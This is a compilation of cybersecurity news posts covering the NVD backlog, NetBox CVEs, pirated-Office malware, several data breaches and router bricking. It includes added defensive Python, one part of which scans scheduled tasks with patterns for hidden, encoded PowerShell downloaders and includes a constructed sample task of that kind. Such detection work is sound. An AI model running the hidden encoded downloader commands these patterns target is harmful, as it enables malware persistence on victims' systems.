NIST Hires External Contractor to Help Tackle National Vulnerability Database Backlog

By: Alan J
31 May 2024 at 16:49

The U.S. National Institute of Standards and Technology (NIST) has taken a big step to address the growing backlog of unprocessed Common Vulnerabilities and Exposures (CVEs) in the National Vulnerability Database (NVD). The institute has hired an external contractor to provide additional processing support. The contractor hasn't been named, but NIST said it expects the move to allow it to return to normal processing rates within the next few months.

Clearing the National Vulnerability Database Backlog

NIST is responsible for managing entries in the NVD. Overwhelmed by the volume of new entries and a backlog of CVEs that has been accumulating since February, the institute has awarded a contract to an external party to assist with processing. "We are confident that this additional support will allow us to return to the processing rates we maintained prior to February 2024 within the next few months," the agency stated.

To further alleviate the backlog, NIST is also working closely with the Cybersecurity and Infrastructure Security Agency (CISA) to improve its overall operations and processes. "We anticipate that this backlog will be cleared by the end of the fiscal year," NIST stated. In its status update, NIST referenced an earlier statement that it was exploring various means of addressing the increasing volume of vulnerabilities through modernized technology and process improvements.

[Image: NIST NVD status update. Source: NIST NVD Status Updates]

"Our goal is to build a program that is sustainable for the long term and to support the automation of vulnerability management, security measurement and compliance," the institute said. NIST reaffirmed its commitment to maintaining and modernizing the NVD, stating, "NIST is fully committed to preserving and updating this vital national resource, which is crucial for building trust in information technology and fostering innovation."

CISA's 'Vulnrichment' Initiative

In response to the growing NVD backlog at NIST, CISA launched its own initiative, "Vulnrichment," to enrich public CVE records. The project is designed to complement the work of the originating CNA (CVE Numbering Authority) and reduce the burden on NIST's analysts. CISA said it would use a Stakeholder-Specific Vulnerability Categorization (SSVC) decision tree to categorize vulnerabilities, considering factors such as exploitation status, technical impact, impact on mission-essential functions and public well-being, and whether exploitation is automatable. CISA welcomes feedback from the cybersecurity community on the effort. By providing enriched CVE data, CISA aims to improve the overall quality and usefulness of the NVD for security professionals. "For those CVEs that do not already have these fields populated by the originating CNA, CISA will populate the associated ADP container with those values when there is enough supporting evidence to do so," the agency explained. As NIST and CISA work to address the current challenges, they have pledged to keep the community informed of their progress and of future modernization plans.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
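The practical consequence of the NVD backlog and of CISA's Vulnrichment effort is that a vulnerability-management pipeline can no longer assume NVD will supply a score: it has to read the CNA's own metrics first and fall back to the ADP container that CISA populates. The following is an added example, not code from NIST, CISA or this article. The record layout (`containers.cna`, `containers.adp[].metrics[]`, an `other` metric of type `ssvc` carrying `content.options`) is modelled on the CVE JSON 5.x format as an assumption, the records and CVE IDs are constructed placeholders, and the `prioritize()` rule is a simplified stand-in for an SSVC deployer tree, not CISA's actual decision table.

```python
"""Score CVE records while NVD analysis is pending: CNA metrics first, then
CISA's Vulnrichment ADP container. Added example; record layout follows CVE
JSON 5.x as an assumption and every record below is constructed."""
from dataclasses import dataclass, field

# Constructed sample records with placeholder IDs (real records carry far more).
SAMPLE_RECORDS = [
    {   # CNA supplied a CVSS score; the CISA ADP adds SSVC decision points
        "cveMetadata": {"cveId": "CVE-0000-00001", "state": "PUBLISHED"},
        "containers": {
            "cna": {"metrics": [{"cvssV3_1": {"baseScore": 9.8, "baseSeverity": "CRITICAL"}}]},
            "adp": [{"providerMetadata": {"shortName": "CISA-ADP"},
                     "metrics": [{"other": {"type": "ssvc", "content": {"options": [
                         {"Exploitation": "none"}, {"Automatable": "no"},
                         {"Technical Impact": "total"}]}}}]}],
        },
    },
    {   # CNA gave no score (typical of the backlog); the ADP supplies both
        "cveMetadata": {"cveId": "CVE-0000-00002", "state": "PUBLISHED"},
        "containers": {
            "cna": {"metrics": []},
            "adp": [{"providerMetadata": {"shortName": "CISA-ADP"},
                     "metrics": [
                         {"cvssV3_1": {"baseScore": 7.5, "baseSeverity": "HIGH"}},
                         {"other": {"type": "ssvc", "content": {"options": [
                             {"Exploitation": "active"}, {"Automatable": "yes"},
                             {"Technical Impact": "partial"}]}}}]}],
        },
    },
    {   # Nothing enriched yet: what an unprocessed entry looks like to a consumer
        "cveMetadata": {"cveId": "CVE-0000-00003", "state": "PUBLISHED"},
        "containers": {"cna": {}},
    },
]


@dataclass
class Triage:
    cve_id: str
    base_score: float        # None when neither CNA nor ADP scored it
    score_source: str        # "cna", "adp" or "none"
    ssvc: dict = field(default_factory=dict)
    priority: str = "defer"


def _cvss_from_metrics(metrics):
    """Pick the first CVSS base score in a metrics list, newest version first."""
    for m in metrics or []:
        for key in ("cvssV4_0", "cvssV3_1", "cvssV3_0"):
            if key in m and "baseScore" in m[key]:
                return float(m[key]["baseScore"])
    return None


def _ssvc_from_adp(adp_containers):
    """Flatten Vulnrichment's list of single-key option dicts into one dict."""
    for c in adp_containers or []:
        for m in c.get("metrics", []):
            other = m.get("other", {})
            if other.get("type") == "ssvc":
                opts = {}
                for o in other.get("content", {}).get("options", []):
                    opts.update(o)
                return opts
    return {}


def prioritize(ssvc, base_score):
    """Simplified priority rule (an assumption, not CISA's full SSVC tree)."""
    expl = ssvc.get("Exploitation", "none").lower()
    auto = ssvc.get("Automatable", "no").lower()
    impact = ssvc.get("Technical Impact", "partial").lower()
    if expl == "active":
        return "immediate"
    if expl == "poc" and (auto == "yes" or impact == "total"):
        return "out-of-cycle"
    if base_score is not None and base_score >= 9.0:
        return "out-of-cycle"
    if base_score is not None and base_score >= 7.0:
        return "scheduled"
    return "defer"


def triage_record(record):
    containers = record["containers"]
    score = _cvss_from_metrics(containers.get("cna", {}).get("metrics"))
    source = "cna" if score is not None else "none"
    if score is None:                       # backlog case: try CISA's ADP container
        for adp in containers.get("adp", []):
            score = _cvss_from_metrics(adp.get("metrics"))
            if score is not None:
                source = "adp"
                break
    ssvc = _ssvc_from_adp(containers.get("adp"))
    return Triage(record["cveMetadata"]["cveId"], score, source, ssvc,
                  prioritize(ssvc, score))


def triage_all(records):
    return [triage_record(r) for r in records]


def count_unscored(records):
    """How many records still have no score from any source (the visible backlog)."""
    return sum(1 for t in triage_all(records) if t.base_score is None)


if __name__ == "__main__":
    for t in triage_all(SAMPLE_RECORDS):
        print(f"{t.cve_id}: score={t.base_score} ({t.score_source}) ssvc={t.ssvc} -> {t.priority}")
    print("unscored:", count_unscored(SAMPLE_RECORDS))
```

The point of the `score_source` field is auditability: when a ticket is opened on an ADP-derived score, the analyst can see that NVD had not yet weighed in and re-check once it does.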

Multiple Vulnerabilities Reported in LenelS2 NetBox Entry Tracking and Event Monitoring Tool

By: Alan J
31 May 2024 at 14:59

Carrier has issued a serious product security advisory confirming the existence of several vulnerabilities in its LenelS2 NetBox access control and event monitoring platform. These vulnerabilities expose the monitoring system to potential compromise, such as remote code execution. The reported vulnerabilities are significant, as NetBox is often used to guard entries at critical facilities such as government-controlled sites and major corporations.

Multiple Vulnerabilities in Carrier's LenelS2 NetBox

Three vulnerabilities were identified in Carrier's product security advisory for NetBox. The most critical of these (CVE-2024-2420) could enable an attacker to bypass authentication and obtain elevated permissions, presenting a serious risk to enterprises that deploy the tool.

[Image: Carrier LenelS2 NetBox advisory. Source: Carrier Product Security Advisory]

Successful compromise could allow an attacker to install programs; view, edit or delete data on the platform; or create new user accounts with full privileges. The impact depends on the access level of the accounts compromised in an attack, and could be lower on systems configured with a low level of user access. The vulnerabilities affect all LenelS2 NetBox versions prior to 5.6.2. The identified vulnerabilities are as follows:
  • CVE-2024-2420 (CVSS v3.1 Base Score 9.8, Critical): A vulnerability involving a hard-coded password in the system that could permit an attacker to bypass authentication requirements.
  • CVE-2024-2421 (CVSS v3.1 Base Score 9.1, Critical): An unauthenticated remote code execution vulnerability that could permit an attacker with elevated permissions to run malicious commands.
  • CVE-2024-2422 (CVSS v3.1 Base Score 8.8, High): An authenticated remote code execution vulnerability that could permit an attacker to execute malicious commands.
The Center for Internet Security (CIS) stated that these vulnerabilities pose a higher risk to large and medium government and business entities, and a lower risk to small businesses and home users.

[Image: CIS risk assessment for the LenelS2 NetBox vulnerabilities. Source: cisecurity.org]

Vulnerability Remediation

Carrier has attempted to address these vulnerabilities in its latest release, NetBox version 5.6.2, and has advised customers to upgrade immediately by contacting their authorized NetBox installer. As further mitigation, Carrier advised customers to follow the recommended deployment guidelines detailed in its NetBox hardening guide, accessible through NetBox's built-in help menu. The Center for Internet Security advised additional measures: applying the appropriate updates to NetBox systems, applying the principle of least privilege to user accounts, rigorous vulnerability scanning, and isolating critical systems, functions and resources. The lack of basic security safeguards, together with poor coding practices such as hard-coded authentication tokens and improper input sanitization, raises concerns about relying on NetBox to guard physical access to important business and government areas or critical infrastructure. While there are no confirmed reports of the NetBox vulnerabilities being exploited in the wild, their severity marks them as an important security consideration, as countless organizations could be at risk of devastating attacks.

Pirated Copies of Microsoft Office Used to Distribute Frequent Malware in South Korea

By: Alan J
31 May 2024 at 10:26

South Korean researchers have observed pirated copies and cracked activators of legitimate productivity and office programs such as Hangul Word Processor and Microsoft Office being used to disguise malicious programs. The malware maintains persistence by scheduling regular updates on affected systems, so that newer strains are installed multiple times every week.

Malicious Pirated Copies of Microsoft Office and Other Programs

Researchers from AhnLab discovered that attackers have been creating and distributing malicious copies of popular utility software through common file-sharing platforms and torrent websites, taking advantage of users looking to obtain software without paying the required license fee. When downloaded and executed, the programs appear as convincing cracked installers or activators for programs such as Microsoft Office or the Hangul word processor. While the initial downloader was developed in .NET, the attackers appear to have moved to more obfuscated techniques. The malware retrieves instructions for the next stage of the attack from Telegram or Mastodon channels operated by the attackers. These channels contain encrypted Base64 strings that resolve to Google Drive or GitHub URLs hosting the malicious payloads. The payloads are downloaded and decrypted using the legitimate 7-Zip archive utility, which is commonly present on systems and has a low footprint. The researchers found that the decrypted payloads contained PowerShell instructions to load and execute additional malware components on the victim's system. The malware strains loaded onto infected systems include:
  • OrcusRAT: A remote access trojan with extensive capabilities like keylogging, webcam access, and remote screen control.
  • XMRig Cryptominer: Configured to stop mining when resource-intensive apps are running to avoid detection. Also kills competing miners and security products.
  • 3Proxy: Injects itself into legitimate processes to open a backdoor proxy server.
  • PureCrypter: Fetches and runs additional malicious payloads from attacker-controlled servers.
  • AntiAV: Disrupts security products by repeatedly modifying their configuration files.
The commands include an updater that maintains persistence through the native Windows Task Scheduler. The C&C server addresses shared by the researchers also indicate that the infrastructure was disguised as a Minecraft RPG server.

Continuous Reinfection and Distribution

The researchers said systems may remain infected even after the initial infection has been removed, because the malware can update itself and download additional payloads. They stated that the attackers had pushed new malware to affected systems multiple times each week to bypass file-based detection. The number of compromised systems continued to increase because the registered Task Scheduler entries kept loading additional malicious components even after the underlying malware had been removed. The researchers advised South Korean users to download software from official sources rather than file-sharing sites. Users who suspect their systems may already be infected should remove the associated Task Scheduler entries to block the download of further components, and update their antivirus software to the latest available version. The researchers have additionally shared indicators of compromise: the detection categories flagged during the attack, MD5 hashes of the files used, associated C&C server addresses, and suspicious behaviors observed during the attack.
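The remediation advice above, removing the Task Scheduler entries that keep re-launching the updater, presumes you can find them. A useful first pass is to export task definitions (for example with `schtasks /query /xml` on the host) and triage the XML offline for the traits this campaign relies on: a script host or archive tool as the action, a user-writable working directory, hidden or encoded command lines, and a repeating trigger. The script below is an added example for that triage and is not code from AhnLab or from this article; the three task definitions are constructed samples in the Task Scheduler XML schema, the detection patterns are the author's assumptions, and the Base64 payload is a labelled placeholder.

```python
"""Triage exported Windows Task Scheduler XML for persistence indicators.
Added example; the task definitions below are constructed, not from the report."""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Script hosts and unpacking tools commonly abused as scheduled-task actions (assumed list)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "7z.exe", "7za.exe"}
# Locations any local user can write to; trusted tasks rarely run from here
USER_WRITABLE = re.compile(r"\\(appdata|temp|programdata|users\\public)\\", re.I)
# Command-line switches and strings typical of hidden, encoded downloaders
SUSPICIOUS_ARGS = re.compile(
    r"(-enc\w*\b|-ec\b|windowstyle\s+hidden|executionpolicy\s+bypass|"
    r"downloadstring|invoke-expression|\biex\b|frombase64string|https?://)", re.I)

SAMPLE_TASKS = [
    # Constructed benign task: built-in binary, fixed system path, no repetition
    r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft\Windows\Example\ServiceCheck</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2024-05-01T03:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>%SystemRoot%\System32\sc.exe</Command><Arguments>query wuauserv</Arguments>
  </Exec></Actions>
</Task>""",
    # Constructed updater-style task: hidden encoded PowerShell, re-run every hour
    r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Updater\OfficeActivation</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2024-05-01T00:00:00</StartBoundary>
    <Repetition><Interval>PT1H</Interval></Repetition>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
    <Arguments>-WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand PLACEHOLDER_BASE64</Arguments>
  </Exec></Actions>
</Task>""",
    # Constructed staging task: archive tool dropped into ProgramData, one-shot trigger
    r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Updater\Unpack</URI></RegistrationInfo>
  <Triggers><TimeTrigger><StartBoundary>2024-05-01T00:05:00</StartBoundary></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\ProgramData\Updater\7z.exe</Command>
    <Arguments>x -y C:\ProgramData\Updater\stage.dat -oC:\ProgramData\Updater</Arguments>
  </Exec></Actions>
</Task>""",
]


@dataclass
class TaskFinding:
    uri: str
    command: str
    arguments: str
    repeats: bool
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def _basename(path: str) -> str:
    """Normalise a (possibly quoted) Windows path to its lower-case file name."""
    return path.strip().strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_task_xml(xml_text: str) -> list:
    """Return one TaskFinding per <Exec> action in a single task definition."""
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="(no URI)", namespaces=NS)
    # A <Repetition> element is what lets a task keep re-launching an updater
    repeats = root.find(".//t:Repetition/t:Interval", NS) is not None
    findings = []
    for ex in root.findall("t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS)
        args = ex.findtext("t:Arguments", default="", namespaces=NS)
        f = TaskFinding(uri, cmd, args, repeats)
        if _basename(cmd) in SCRIPT_HOSTS:
            f.reasons.append(f"action runs script host/unpacker {_basename(cmd)}")
        if USER_WRITABLE.search(cmd) or USER_WRITABLE.search(args):
            f.reasons.append("references a user-writable directory")
        if SUSPICIOUS_ARGS.search(args):
            f.reasons.append("arguments match hidden/encoded/download pattern")
        if repeats and f.reasons:
            f.reasons.append("repeating trigger re-launches it")
        findings.append(f)
    return findings


def triage_tasks(task_xmls) -> list:
    return [f for xml in task_xmls for f in analyze_task_xml(xml)]


if __name__ == "__main__":
    for f in triage_tasks(SAMPLE_TASKS):
        flag = "SUSPICIOUS" if f.suspicious else "ok"
        print(f"{flag:10} {f.uri}: {f.command} {f.arguments}")
        for r in f.reasons:
            print("           -", r)
```

Findings that hit on more than one reason, and in particular the combination of a repeating trigger with a script host, are the entries worth deleting and then re-checking after a reboot, since the report notes that surviving tasks re-download components that file-based removal has already cleaned up.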

Toshiba America Data Breach: Customers and State Authorities Notified

By: Alan J
30 May 2024 at 16:15

Toshiba America Business Solutions reached out to customers to inform them of a potential data security incident in which their personal information may have been compromised. Toshiba America Business Solutions is an American subsidiary of the Toshiba TEC Corporation. The company said that it was committed to protecting the confidentiality and security of personal data, and offered credit monitoring services to affected individuals.

Toshiba America Data Breach

After conducting a preliminary investigation, Toshiba reported that an attacker may have compromised its email environment and, through that compromise, may have obtained unauthorized access to sensitive personally identifiable information such as names and Social Security numbers. The investigation confirmed that the breach could have impacted numerous individuals, leading Toshiba to contact affected individuals, as legally required. Toshiba America Business Solutions advised customers to remain vigilant following the incident, and to regularly review their credit reports, financial account statements, and payment card statements for any unauthorized activity. Any suspicious activity can be reported to Toshiba or law enforcement agencies. Toshiba apologized to the affected individuals for any inconvenience stemming from the incident and said that additional measures had since been implemented to enhance the security of its email environment and prevent similar occurrences in the future. To assist the affected individuals in safeguarding their personal information, Toshiba has arranged a complimentary two-year membership of identity monitoring services offered through Kroll. The membership includes triple-bureau credit monitoring, fraud consultation, and identity theft restoration. The fraud consultation option allows affected individuals to reach out to Kroll fraud specialists for advice and assistance relating to identity protection, legal rights, and detection of suspicious activity. The identity theft restoration option lets affected individuals work with a licensed Kroll investigator to resolve potential identity theft issues. Toshiba stated that these services would be provided free of charge and would not negatively impact recipients' credit scores. Affected individuals were encouraged to use the services and to contact Toshiba or Kroll for additional assistance.

Law Firm Announces Investigation

Strauss Borrelli PLLC, a data breach law firm, announced on its website that it would be investigating Toshiba America Business Solutions, Inc. with regard to the recent data breach that exposed sensitive personally identifiable information. While the full extent of the data breach is unknown, the Toshiba America Business Solutions division operates offices across the U.S. and Latin America. The law firm encouraged customers who received a breach notification letter from Toshiba America Business Solutions to contact Strauss Borrelli PLLC to discuss their rights and potential legal remedies in response to the incident.

Malicious Firmware Update Destroyed Over 600,000 Routers Across ISP

By: Alan J
30 May 2024 at 14:12

In one of the largest mass bricking events in history, at least 600,000 routers belonging to subscribers of the same ISP service were essentially destroyed last October. The incident has been dubbed "Pumpkin Eclipse," with researchers still unclear on how the routers became infected. The affected devices displayed a steady red light and were unresponsive to troubleshooting attempts, and had to be replaced. Now new research is shedding light on the attack, which involved unusually sophisticated and stealthy attack methods.

'Pumpkin Eclipse' Router Attack

The attack began on October 25, 2023, as the ISP's subscribers began reporting that their ActionTec T3200 and Sagemcom routers had suddenly stopped working. Users described the devices as unresponsive, with a steady red light on the front panel. Many blamed the ISP for the mass "bricking" of the routers, alleging the company had pushed faulty firmware updates. However, according to new research by Black Lotus Labs, the incident was in fact the result of a deliberate, malicious act. The researchers reported that over a 72-hour period, malware known as "Chalubo" infected over 600,000 routers connected to a single autonomous system number (ASN) belonging to an unnamed ISP. While the researchers avoided naming the affected ISP, the description of the attack matches complaints voiced months ago by subscribers of the Windstream ISP, including the router models affected and the resulting behavior. The Chalubo malware, a commodity remote access trojan (RAT) first identified in 2018, employed sophisticated tactics to cover its tracks: it removed all files from the infected devices' disks, ran entirely in memory, and assumed random process names already present on the routers. The researchers believe the malware downloaded and ran code that permanently overwrote the routers' default firmware, rendering the devices inoperable. The researchers state that while the motives behind the attack are unknown, its implications are troubling.

Researchers Unsure Over Initial Attack Vector but Theorize Possibilities

Although the researchers identified the malware's multi-stage attack chain and its spread across the ISP's network, they have been unable to determine the initial infection vector employed by the threat actor. They theorize that it could have resulted from exploitation of a vulnerability in the devices, exploitation of weak credentials, or compromise of the routers' administrative panels. The researchers said the attack is highly concerning, as it sets a new precedent for malware capable of mass-bricking consumer networking devices. They could recall only one comparable prior event: the 2022 discovery of the AcidRain malware, which knocked out over 10,000 satellite internet modems in Ukraine and Europe at the start of the Russian invasion. The researchers said the impact of the "Pumpkin Eclipse" attack was particularly severe, as the affected ISP's service area covers many rural and underserved communities. Residents may have lost access to emergency services, farmers could have been cut off from remote crop monitoring, and healthcare providers may have been unable to access patient records or provide telehealth services. "At this time, we do not assess this to be the work of a nation-state or state-sponsored entity. In fact, we have not observed any overlap with known destructive activity clusters; particularly those prone to destructive events such as Volt Typhoon, or SeaShell Blizzard," the Lumen researchers wrote. Nonetheless, they speculated that the use of a commodity malware family may have been a deliberate move to obscure the perpetrator's identity. Recovery from such a supply chain disruption is always more challenging in isolated or vulnerable regions, the researchers added.

Johnson & Johnson Reports Data Breach Potentially Linked to Massive Cencora Breach

By: Alan J
30 May 2024 at 10:40

Pharmaceutical giant Johnson & Johnson recently announced a data breach that may stem from a larger data breach affecting Lash Group, a division of Cencora. In February, Cencora reported a data breach incident to the U.S. Securities and Exchange Commission (SEC) after learning that data had been exfiltrated from its information systems, some of which contained personal information. The breach may have compromised some sensitive information of patients registered with Johnson & Johnson Patient Assistance Foundation, Inc.

Johnson & Johnson Data Breach Notice

On May 29, Johnson & Johnson filed a notice of data breach with the Attorney General of Texas, indicating that an unauthorized party had accessed confidential patient information. The breach affected approximately 175,000 Texans, but the total number of victims nationwide could be much higher. It affects two Johnson & Johnson entities: Johnson & Johnson Patient Assistance Foundation, Inc., and Johnson & Johnson Services, Inc. The data compromised in the attack comprised individuals' names, addresses, medical information, and dates of birth. Data breach notification letters have been sent to all affected individuals, while limited information is available on the Texas Attorney General's data breach reports page. The incident is potentially linked to a much larger breach involving Cencora, which has affected over a dozen major pharmaceutical companies so far.

Link to Cencora Data Breach

The Johnson & Johnson data breach bears several similarities to other large third-party pharmaceutical company data breaches affected by the Cencora/Lash Group data breach, which was first discovered on February 21. Cencora’s Lash Group division aids pharmaceutical companies in running patient support programs that try to ensure that costly medication is available to disadvantaged patients, regardless of their ability to pay for them. At least 15 clients of Cencora/Lash Group have notified state authorities of data breach incidents, with databreaches.net listing the following victims:
  • AbbVie: 54,344 Texans affected
  • Acadia Pharmaceuticals: 753 Texans affected
  • Bayer: 8,822 Texans affected
  • Bristol Myers Squibb and/or the Bristol Myers Squibb Patient Assistance Foundation: 256,237 Texans and 11,503 New Hampshire residents affected
  • Dendreon: 2,923 Texans affected
  • Endo: no numbers provided
  • Genentech: 5,805 Texans affected
  • GlaxoSmithKline Group of Companies and/or the GlaxoSmithKline Patient Access Programs Foundation: no numbers provided
  • Incyte Corporation: 2,592 Texans affected
  • Marathon Pharmaceuticals, LLC/PTC Therapeutics, Inc.: 466 Texans and 27 New Hampshire residents affected
  • Novartis Pharmaceuticals: 12,134 Texans affected
  • Pharming Healthcare, Inc.: 314 Texans and 9 New Hampshire residents affected
  • Regeneron Pharmaceuticals: 91,514 Texans affected
  • Sumitomo Pharma America, Inc.: 24,102 Texans affected
  • Tolmar: 1 New Hampshire resident
Data breach notices have also been filed with California officials. While the full extent of the damage has yet to be determined, the breach has affected over 540,000 patients so far. Cencora stated in its notification to the Securities and Exchange Commission that it had not yet been able to determine whether the incident had a material impact on its operations. In a notice on its website, the Lash Group indicated that personal information as well as personal health information had potentially been affected, including first name, last name, date of birth, health diagnosis, and/or medications and prescriptions. The Lash Group said in a statement that there was no evidence the data had been exposed or misused as a result of the incident:
"There is no evidence that any of this information has been or will be publicly disclosed, or that any information was or will be misused for fraudulent purposes as a result of this incident, but we are communicating this so that affected individuals can take the steps outlined below to protect yourself."
The Lash Group is offering free credit monitoring and remediation services to affected individuals, along with additional guidance on dealing with suspected breaches of personal information. No perpetrator has been identified or named as responsible for the attack, and the potential impact of the breach is still being assessed.

BreachForums Breached? Forum’s Return Sparks Fear Among Cybercriminals

By: Alan J
29 May 2024 at 10:13

Following the seizure of the BreachForums domain and the arrest of Baphomet, its new owner ShinyHunters seems to have fully regained control over the site after a recent announcement that the forum will be open for account registration. While the domain itself appeared to have been seized back from law enforcement, the site remained dysfunctional for a while as staff redirected visitors to a new Telegram channel. The site slowly resumed operations while initially disabling account registration. However, the arrests and law enforcement activity connected to the operation of the domain, as well as its quick return to operations, have led cybercriminals to fear possible compromise of the forum infrastructure by law enforcement.

BreachForums Seizure and Return

BreachForums, widely recognized as the successor to RaidForums, has faced several downtimes, seizures and disruptions in its eventful history. The original owner, Conor Brian Fitzpatrick AKA "Pompompurin," was arrested last year on cybercrime and device fraud charges. BreachForums administrator "Baphomet" announced that he would step in as successor and opened a new domain to resume forum activity. However, Baphomet himself feared site compromise by law enforcement and temporarily shut down the forums, stating that "nothing is safe anymore."

[Image: Baphomet's announcement of the BreachForums return. Source: Cyble]

Baphomet later announced that he would be working on a new domain and resuming forum operations, and the forum soon returned with regular data leak sharing and discussion. A year later, Baphomet himself was arrested in a joint law enforcement operation, which also seized the BreachForums domain and official Telegram channel. The administrator ShinyHunters emerged as the successor, confirming Baphomet's arrest. However, the domain seizure was short-lived, and the domain was soon redirecting users to a new Telegram channel. An allegedly leaked conversation between an FBI operative and BreachForums' previous domain name registrar and hosting provider, NiceNic, also appeared to indicate that ShinyHunters had regained control over domain ownership despite its court-ordered seizure.

[Image: Alleged FBI correspondence regarding the BreachForums seizure. Source: Telegram]

After a period of dysfunction, BreachForums has now resumed operations, with threat actors already claiming new victims in forum postings.

Emerging Alternatives and Criminal Suspicion Over BreachForums

In the wake of the recent seizure, several other individuals expressed doubts over BreachForums and its possible use as a "honeypot" by law enforcement to entrap cybercriminals and disrupt operations. The owner of Secretforums and former owner of Blackforums expressed his belief over Telegram that Baphomet was possibly a law enforcement informant, citing the latter's interest in maintaining the infrastructure of Blackforums. Prominent threat actor USDoD also cast doubt over the succession of BreachForums to the administrator ShinyHunters, citing his low stats on the previous domain. These concerns were followed by the self-promotion of Secretforums and of USDoD's announced project "Breach Nation" as possible alternatives. More recently, the CyberNi***rs threat actor group also announced its intention to start a new site to coordinate its operations. Despite these activities and the surrounding suspicion, new owner ShinyHunters seems eager to return to earlier activities, judging by their claim of responsibility for an attack impacting Live Nation Entertainment Inc., the parent company of Ticketmaster. The outcome of these events, their effect on the cybercriminal ecosystem, and the viability of emerging forums as alternatives to the relaunched BreachForums led by ShinyHunters remain unclear. But given how vocal the participants are, the picture will almost certainly get clearer with time.

A Quest Gone Awry: Hackers Disrupt Bring Me The Horizon’s Hidden M8 Artificial Reality Game

By: Alan J
29 May 2024 at 05:55

Fans of Bring Me The Horizon have been fervently searching for secrets and clues hidden within an 'M8 Artificial Reality game' subtly teased in a recent music video by the band. Near the video's conclusion, a character emerges, briefly greets viewers, and then abruptly instructs them to search for a specific code. Although the discovery of the hidden game thrilled many, excitement was momentarily dampened when the game's website was swapped out for a warning urging visitors not to hack into the system.

Bring Me The Horizon Hidden M8 Artificial Reality Game

Bring Me the Horizon, a British rock band formed in Sheffield in 2004, is celebrated for embedding hidden meanings, easter eggs, and clues in their music. With the release of their latest album, 'POST HUMAN: NeX GEn,' the band has notably deepened this practice, incorporating even more intricate layers of secrets into their songs. In one of the music videos from this album, a character named 'M8' appears and begins to greet the viewer but is abruptly stopped by a 'fatal-error'. M8 then directs the viewer to find the 'serial number' located on the side of its head. A curious listener analyzed that segment of the video further and discovered a hidden spectrogram containing a QR code, sharing an image of it on the band's subreddit. Fans then discovered that the QR code led to the domain of a hidden hacking-themed website containing the M8 Artificial Reality Game.

[Image: QR code hidden in the video's spectrogram. Source: /r/BringMeTheHorizon subreddit]

The M8 Artificial Reality site then instructed users to enter a hidden serial code, which fans worked out from several other clues. The site contained unreleased tracks, password-protected files, and various mysteries for fans to uncover.

[Image: The hidden M8 Artificial Reality Game site. Source: multidimensionalnavigator8.help]

As news of the hidden website spread, fans swiftly set up a dedicated Discord server and collaborated using a Google Doc to unearth all the site's secrets. However, their excitement was brief. Hackers soon tried to extract further secrets from the website using unconventional methods, leading the developers to temporarily shut down the site and issue a warning to fans.

Warnings Over Hacking Attempts

After the hacking attempts, cautionary messages from M8, the album's virtual guide, expressed dismay at the intrusion, stressing how such actions undermined the spirit of collective exploration. These messages were delivered both through the website, which was temporarily replaced with the warning for 2 hours, and through email.

[Image: Bring Me The Horizon M8 hacking game warning. Source: archive.org]

[Image: Artificial Reality M8 hacking warning email. Source: BringMeTheHorizon ARG Discord]

The developers appeared to indirectly condemn these attempts through the creative use of the M8 character, without specifying the nature of the intrusion or identifying the perpetrators. Some fans, however, found the warning unexpected when they received the email after explorations they believed were legitimate interactions. The community felt that a select few hackers had ruined the experience for others, and its Discord server noted the downtime in its FAQ.

[Image: M8 Artificial Reality Bring Me the Horizon Discord]

Bring Me The Horizon's foray into alternate reality gaming showcases the creative potential of digital media in music and album promotion. As fans continue to work together to unravel the remaining mysteries and solve the puzzles within the ARG, it remains to be seen what other surprises await them on the hidden website. The hacking attempts and the subsequent warnings serve as a reminder that while ARGs can be an engaging and immersive experience, it is essential to respect the developers' intentions and play fair so that everyone can enjoy the journey together.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Strauss Borrelli PLLC Law Firm Investigates WD & Associates Data Breach

By: Alan J
29 May 2024 at 03:04

WD & Associates Data Breach

Strauss Borrelli PLLC, a leading law firm known for handling data breach litigation, has launched an investigation into the recent WD & Associates data breach. WDA, based in Rhode Island, is an employee benefits brokerage firm specializing in healthcare consulting. The company assists clients in making well-informed decisions about financial planning and employee benefits. The incident may have exposed sensitive personally identifiable information and protected health information for an undetermined number of patients and other affected individuals.

WD & Associates Data Breach

WD & Associates provides a wide range of services, including Employee Benefits, Safe Money Management, HR Consulting, Retirement Planning, IRA Rollovers, Actuarial Consulting, Risk Management, Business Consulting, and Organizational Development. Information handled through these services may have been compromised in the recent data breach. The security incident occurred between February 1 and February 9, 2023, when an unauthorized actor accessed sensitive information stored on WDA systems. WD stated that it took immediate action to secure its network and launched an investigation to determine the nature and scope of the breach. WDA began notifying potentially impacted individuals of the incident on May 24, 2024. The potentially exposed information includes:
  • Name
  • Social Security number
  • Date of birth
  • Driver’s license number
  • Passport number
  • Financial account information
  • Medical information
  • Health insurance information
